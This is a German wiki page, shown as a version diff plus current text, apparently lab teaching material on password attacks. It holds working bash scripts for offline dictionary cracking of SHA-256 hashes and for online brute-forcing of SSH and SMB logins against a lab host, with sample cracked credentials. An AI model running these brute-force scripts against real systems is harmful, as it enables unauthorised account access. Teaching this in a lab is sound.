Passwort Angriffe Prinzip: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 22: | Zeile 22: | ||
*cat pw-crack-offline-hash.sh | *cat pw-crack-offline-hash.sh | ||
<syntaxhighlight lang="bash"> | <syntaxhighlight lang="bash"> | ||
| + | #!/bin/bash | ||
#!/bin/bash | #!/bin/bash | ||
HASH=$1 | HASH=$1 | ||
while read LINE | while read LINE | ||
do | do | ||
| − | + | PW_HS=$(echo $LINE | cut -f 2 -d :) | |
| − | + | if [[ $PW_HS == $HASH ]] | |
then | then | ||
| − | + | PW=$(echo $LINE | cut -f 1 -d :) | |
| + | echo "Treffer: $PW" | ||
exit | exit | ||
| Zeile 37: | Zeile 39: | ||
*./pw-crack-offline-hash.sh ba22bae4d286f37a07e800585b8acba09add0e2a370c6ea5b2b354f859d8c12d bad-passwords.hash | *./pw-crack-offline-hash.sh ba22bae4d286f37a07e800585b8acba09add0e2a370c6ea5b2b354f859d8c12d bad-passwords.hash | ||
Treffer: lovely | Treffer: lovely | ||
| + | |||
=ssh hack= | =ssh hack= | ||
*sudo apt install sshpass | *sudo apt install sshpass | ||
Version vom 25. Juni 2026, 04:50 Uhr
Normale Hack
- wget https://xinux.de/downloads/bad-passwords
- cat pw-crack-offline.sh
#!/bin/bash
HASH=$1
while read LINE
do
PW_HS=$(echo $LINE | sha256sum | cut -f 1 -d " ")
if [[ $PW_HS == $HASH ]]
then
echo "Treffer: $LINE"
exit
fi
done < $2
- ./pw-crack-offline.sh cd293be6cea034bd45a0352775a219ef5dc7825ce55d1f7dae9762d80ce64411 bad-passwords
Treffer: whatever
Hash Tabelle
- wget https://xinux.de/downloads/bad-passwords.hash
- cat pw-crack-offline-hash.sh
#!/bin/bash
#!/bin/bash
HASH=$1
while read LINE
do
PW_HS=$(echo $LINE | cut -f 2 -d :)
if [[ $PW_HS == $HASH ]]
then
PW=$(echo $LINE | cut -f 1 -d :)
echo "Treffer: $PW"
exit
fi
done < $2
- ./pw-crack-offline-hash.sh ba22bae4d286f37a07e800585b8acba09add0e2a370c6ea5b2b354f859d8c12d bad-passwords.hash
Treffer: lovely
ssh hack
- sudo apt install sshpass
- cat ssh-pass-hack.sh
#!/bin/bash
# einfaches SSH-PW-Brute wie hydra (Lab)
HOST=$1
USER=$2
WORTLISTE=$3
while read PW
do
if sshpass -p "$PW" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o PreferredAuthentications=password "$USER@$HOST" "exit" 2>/dev/null
then
echo "Treffer: $USER:$PW"
exit
fi
done < "$WORTLISTE"
./ssh-pass-hack.sh 192.168.16.213 martha bad-passwords
Treffer: martha:basketball
ssh hack
- cat smb-pass-hack.sh
#!/bin/bash
# einfaches SMB-PW-Brute wie hydra (Lab)
HOST=$1
USER=$2
WORTLISTE=$3
while read PW
do
if smbclient -L "//$HOST" -U "$USER%$PW" -m SMB3 2>/dev/null >/dev/null
then
echo "Treffer: $USER:$PW"
exit
fi
done < "$WORTLISTE"
./smb-pass-hack.sh 192.168.16.213 martha bad-passwords
Treffer: martha:basketball